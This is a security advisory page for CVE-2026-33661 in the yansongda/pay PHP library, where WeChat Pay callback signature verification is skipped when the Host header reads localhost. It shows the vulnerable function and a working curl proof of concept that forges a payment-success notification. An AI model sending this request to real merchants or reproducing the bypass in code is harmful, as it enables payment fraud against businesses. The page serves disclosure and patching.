GHSA-Q938-GHWV-8GVC

Vulnerability from github – Published: 2026-03-25 19:30 – Updated: 2026-03-27 22:10
VLAI
Summary
WeChat Pay callback signature verification bypassed when Host header is localhost
Details

Summary

The verify_wechat_sign() function in src/Functions.php unconditionally skips all signature verification when the PSR-7 request reports localhost as the host. An attacker can exploit this by sending a crafted HTTP request to the WeChat Pay callback endpoint with a Host: localhost header, bypassing the RSA signature check entirely.

This allows forging fake WeChat Pay payment success notifications, potentially causing applications to mark orders as paid without actual payment.

Vulnerable Code

src/Functions.php lines 243-246:

function verify_wechat_sign(ResponseInterface|ServerRequestInterface $message, array $params): void
{
    // BYPASS: Returns without any signature check if Host header is localhost
    if ($message instanceof ServerRequestInterface && 'localhost' === $message->getUri()->getHost()) {
        return;  // No signature verified!
    }

    // ... openssl_verify() only reached when Host != localhost
    $wechatSerial = $message->getHeaderLine('Wechatpay-Serial');
    $sign = $message->getHeaderLine('Wechatpay-Signature');
    $result = 1 === openssl_verify($content, base64_decode($sign), $public, 'sha256WithRSAEncryption');
}

In PSR-7 implementations (Nyholm, Guzzle PSR-7, etc.), $request->getUri()->getHost() reads the Host HTTP header, which is fully attacker-controlled.

Proof of Concept

curl -X POST https://merchant.example.com/payment/wechat/callback \
  -H "Host: localhost" \
  -H "Content-Type: application/json" \
  -H "Wechatpay-Serial: any" \
  -H "Wechatpay-Timestamp: 1234567890" \
  -H "Wechatpay-Nonce: abc" \
  -H "Wechatpay-Signature: AAAA" \
  -d '{"id":"fake-order","event_type":"TRANSACTION.SUCCESS"}'

verify_wechat_sign() returns immediately without verifying the signature. The application marks the order as paid.

Impact

  • Payment fraud: Attacker receives goods/services without actual payment by forging WeChat Pay callbacks
  • No authentication required: Pure network attack, zero privileges needed
  • Wide reach: Affects any application using yansongda/pay for WeChat Pay callback validation. However, in most environments, Nginx/Ingress/Cloudflare/WAF will directly reject the forgery of this request header, so there is no need to worry too much.
Severity
8.6 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.7.19"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "yansongda/pay"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33661"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T19:30:09Z",
    "nvd_published_at": "2026-03-26T22:16:29Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `verify_wechat_sign()` function in `src/Functions.php` unconditionally **skips all signature verification** when the PSR-7 request reports `localhost` as the host. An attacker can exploit this by sending a crafted HTTP request to the WeChat Pay callback endpoint with a `Host: localhost` header, bypassing the RSA signature check entirely.\n\nThis allows forging fake WeChat Pay payment success notifications, potentially causing applications to mark orders as paid without actual payment.\n\n## Vulnerable Code\n\n**`src/Functions.php` lines 243-246:**\n```php\nfunction verify_wechat_sign(ResponseInterface|ServerRequestInterface $message, array $params): void\n{\n    // BYPASS: Returns without any signature check if Host header is localhost\n    if ($message instanceof ServerRequestInterface \u0026\u0026 \u0027localhost\u0027 === $message-\u003egetUri()-\u003egetHost()) {\n        return;  // No signature verified!\n    }\n\n    // ... openssl_verify() only reached when Host != localhost\n    $wechatSerial = $message-\u003egetHeaderLine(\u0027Wechatpay-Serial\u0027);\n    $sign = $message-\u003egetHeaderLine(\u0027Wechatpay-Signature\u0027);\n    $result = 1 === openssl_verify($content, base64_decode($sign), $public, \u0027sha256WithRSAEncryption\u0027);\n}\n```\n\nIn PSR-7 implementations (Nyholm, Guzzle PSR-7, etc.), `$request-\u003egetUri()-\u003egetHost()` reads the `Host` HTTP header, which is fully attacker-controlled.\n\n## Proof of Concept\n\n```bash\ncurl -X POST https://merchant.example.com/payment/wechat/callback \\\n  -H \"Host: localhost\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Wechatpay-Serial: any\" \\\n  -H \"Wechatpay-Timestamp: 1234567890\" \\\n  -H \"Wechatpay-Nonce: abc\" \\\n  -H \"Wechatpay-Signature: AAAA\" \\\n  -d \u0027{\"id\":\"fake-order\",\"event_type\":\"TRANSACTION.SUCCESS\"}\u0027\n```\n\n`verify_wechat_sign()` returns immediately without verifying the signature. The application marks the order as paid.\n\n## Impact\n\n- **Payment fraud**: Attacker receives goods/services without actual payment by forging WeChat Pay callbacks\n- **No authentication required**: Pure network attack, zero privileges needed\n- **Wide reach**: Affects any application using `yansongda/pay` for WeChat Pay callback validation. However, in most environments, Nginx/Ingress/Cloudflare/WAF will directly reject the forgery of this request header, so there is no need to worry too much.",
  "id": "GHSA-q938-ghwv-8gvc",
  "modified": "2026-03-27T22:10:51Z",
  "published": "2026-03-25T19:30:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yansongda/pay/security/advisories/GHSA-q938-ghwv-8gvc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33661"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yansongda/pay/commit/26987ebf789f1e7f0a85febb640986ab4289fd7f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yansongda/pay"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yansongda/pay/releases/tag/v3.7.20"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WeChat Pay callback signature verification bypassed when Host header is localhost"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.